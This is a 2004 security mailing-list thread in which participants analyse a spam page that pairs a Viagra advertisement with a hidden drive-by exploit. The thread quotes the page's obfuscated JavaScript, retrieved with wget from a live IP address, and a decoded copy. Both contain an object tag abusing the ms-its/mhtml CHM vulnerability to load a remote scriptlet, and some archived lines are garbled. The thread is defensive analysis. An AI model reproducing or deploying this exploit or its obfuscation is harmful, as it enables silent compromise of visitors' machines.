[Dshield] FW: Osama Bin Laden Captured

Bjorn Stromberg bjorn at thechemistrylab.com
Fri Apr 23 16:06:31 GMT 2004


This page will display an ad for drugs and then uses the CHM vulnerability
to do something nasty, still investigating

Here's the unobfuscated html:

<HTML><HEAD><TITLE>where to buy viagra</TITLE>
<META http-equiv=cONTENT-TYPE content="TEXT/HTML; cHARSET=ISO-8859-1">

<META content="Buy Viagra online with huge discounts. No prescription
needed." name=DEScRIPTION>
<META content="buy viagra" name=KEYWORDS>
<META http-equiv=PRAGMA content:DNO-cAcHE>
<META content=NOARcHIVE name=ROBOTS>

<META content="MSHTML 6.00.2600.0" name=GENERATOR><!/HEAD>
<BODY>
<FONT face=Arial color=#000080 size=3><B>Welcome to Global-Viagra.com
</B></FONT>
<BR><FONT face=Arial color=#000080 size=3><B>IF YOU SUFFER FROM
</B></FONT><FONT
face=Arial color=#000080 size=2><BR><BR>Limited performance ?
<BR><BR>Inability
to sustain erection ? <BR><BR>If you answer "yes" to these questions, then
click
on any of the links below <BR><BR%3!E%3">Order page</A> <BR><A
href="prescription.html">Prescription</A> <BR><A
href="testimonial.html">Men with sexual inability speak
out</A> <BR><A href="supply.html">Supply of
pharmaceutical impotence drug</A> <BR><A
href="consult.html">Online medical consultation</A>
</FONT><BR><BR>

<textarea id="code" style="display:none;">
    <object data="ms-its:mhtml:file://c:\foo.mht!http://---insert bad place
here---//pics.chm::/pics.htm" type="text/x-scriptlet"></object>

Bjorn Stromberg
::this is not a sig::

----- Original Message ----- 
From: "Kevin M. Shortt" <shortt at cgicafe.com>
To: "General DShield Discussion List" <list at lists.dshield.org>
Sent: Friday, April 23, 2004 8:53 AM
Subject: Re: [Dshield] FW: Osama Bin Laden Captured


>
>
> I just used "wget http://220.95.231.54/pics/"
> to view what was there.
> This is what was retrieved.
>
> -k
>
>
>
> <!--
> function S(){var s=location.href.substr(7);return
> s.substr(0,s.indexOf('/'));}
> function T(){return 'l';}
> function U(){return 'C';}
> function V(){return 'm';}
> function W(){return '.';}
> function X(){return 'E';}
> function Y(){return 'i';}
> function Z(){return 'x';}
>
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+"%
3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X
()+"%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20http-equ"+Y()+"v%3D"+U()+"ONT"+X()+
"NT-TYP"+X()+"%20content%3D%22T"+X()+"XT/HTML%3B%20"+U()+"HARS"+X()+"T%3DISO
-8859-1%22%3"+X()+"%0D%0A%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22Buy%20V"+Y
()+"agra%20on"+T()+""+Y()+"ne%20w"+Y()+"th%20huge%20d"+Y()+"scounts"+W()+"%2
0No%20prescr"+Y()+"pt"+Y()+"on%20needed"+W()+"%22%20na"+V()+"e%3DD"+X()+"S"+
U()+"RIPTION%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22buy%20v"+Y()+"
agra%22%20na"+V()+"e%3DK"+X()+"YWORDS%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20ht
tp-equ"+Y()+"v%3DPRAGMA%20content%3aDNO-"+U()+"A"+U()+"H"+X()+"%3"+X()+"%0D%
0A%3"+U()+"M"+X()+"TA%20content%3DNOAR"+U()+"HIV"+X()+"%20na"+V()+"e%3DROBOT
S%3"+X()+"%0D%0A%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22MSHTML%206"+W()+"00
"+W()+"2600"+W()+"0%22%20na"+V()+"e%3DG"+X()+"N"+X()+"RATOR%3"+X()+"%3"+U()+
"!
>
/H"+X()+"AD%3"+X()+"%0D%0A%3"+U()+"BODY%3"+X()+"%0D%0A%3"+U()+"FONT%20face%3
DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000080%20s"+Y()+"ze%3D3%3"+X()+"%3"+U(
)+"B%3"+X()+"We"+T()+"co"+V()+"e%20to%20G"+T()+"oba"+T()+"-V"+Y()+"agra"+W()
+"co"+V()+"%20%0D%0A%3"+U()+"/B%3"+X()+"%3"+U()+"/FONT%3"+X()+"%0D%0A%3"+U()
+"BR%3"+X()+"%3"+U()+"FONT%20face%3DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000
080%20s"+Y()+"ze%3D3%3"+X()+"%3"+U()+"B%3"+X()+"IF%20YOU%20SUFF"+X()+"R%20FR
OM%20%3"+U()+"/B%3"+X()+"%3"+U()+"/FONT%3"+X()+"%3"+U()+"FONT%20%0D%0Aface%3
DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000080%20s"+Y()+"ze%3D2%3"+X()+"%3"+U(
)+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"L"+Y()+""+V()+""+Y()+"ted%20perfor"+V()+"a
nce%20%3F%20%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"Inab"+Y()+""+T()+""+Y()+
"ty%20%0D%0Ato%20susta"+Y()+"n%20erect"+Y()+"on%20%3F%20%3"+U()+"BR%3"+X()+"
%3"+U()+"BR%3"+X()+"If%20you%20answer%20%22yes%22%20to%20these%20quest"+Y()+
"ons%2"+U()+"%20then%20c"+T()+""+Y()+"ck%20%0D%0Aon%20any%20of%20the%20"+T()
!
>  +""+Y()+"nks%20be"+T()+"ow%20%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3!
> "+X()+"%3
> )+"%22%3"+X()+"Order%20page%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%3"+
U()+"A%20%0D%0Ahref%3D%22prescr"+Y()+"pt"+Y()+"on"+W()+"ht"+V()+""+T()+"%22%
3"+X()+"Prescr"+Y()+"pt"+Y()+"on%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%
3"+U()+"A%20%0D%0Ahref%3D%22test"+Y()+""+V()+"on"+Y()+"a"+T()+""+W()+"ht"+V(
)+""+T()+"%22%3"+X()+"Men%20w"+Y()+"th%20se"+Z()+"ua"+T()+"%20"+Y()+"nab"+Y(
)+""+T()+""+Y()+"ty%20speak%20%0D%0Aout%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"
+X()+"%3"+U()+"A%20href%3D%22supp"+T()+"y"+W()+"ht"+V()+""+T()+"%22%3"+X()+"
Supp"+T()+"y%20of%20%0D%0Aphar"+V()+"aceut"+Y()+"ca"+T()+"%20"+Y()+""+V()+"p
otence%20drug%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%3"+U()+"A%20%0D%0Ah
ref%3D%22consu"+T()+"t"+W()+"ht"+V()+""+T()+"%22%3"+X()+"On"+T()+""+Y()+"ne%
20"+V()+"ed"+Y()+"ca"+T()+"%20consu"+T()+"tat"+Y()+"on%3"+U()+"/A%3"+X()+"%2
0%0D%0A%3"+U()+"/FONT%3"+X()+"%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"%0D%0A
%0D%0A%3"+U()+"te"+Z()+"tarea%20"+Y()+"d%3D%22code%22%20sty"+T()+"e%3D%22d"+
Y()!
>
+"sp"+T()+"ay%3Anone%3B%22%3"+X()+"%0D%0A%20%20%20%20%3"+U()+"object%20data%
3D%22%26%23109%3Bs-"+Y()+"ts%3A"+V()+"ht"+V()+""+T()+"%3Af"+Y()+""+T()+"e%3A
//"+U()+"%3A%5"+U()+"foo"+W()+""+V()+"ht%21http%3A//"+S()+"//p"+Y()+"cs"+W()
+"ch"+V()+"%3A%3A/p"+Y()+"cs"+W()+"ht"+V()+"%22%20type%3D%22te"+Z()+"t/"+Z()
+"-scr"+Y()+"pt"+T()+"et%22%3"+X()+"%3"+U()+"/object%3"+X()+"%0D%0A%3"+U()+"
/te"+Z()+"tarea%3"+X()+"%0D%0A%3"+U()+"object%20data%3D%22"+V()+"s-"+Y()+"ts
%3A"+V()+"ht"+V()+""+T()+"%3Af"+Y()+""+T()+"e%3A//"+U()+"%3A%5"+U()+"foo"+W(
)+""+V()+"ht%21http%3A//"+S()+"//p"+Y()+"cs"+W()+"ch"+V()+"%3A%3A/p"+Y()+"cs
"+W()+"ht"+V()+"%22%20type%3D%22te"+Z()+"t/"+Z()+"-scr"+Y()+"pt"+T()+"et%22%
3"+X()+"%3"+U()+"/object%3"+X()+""));
> //-->
>
>
> _______________________________________________
> list mailing list
> list at lists.dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list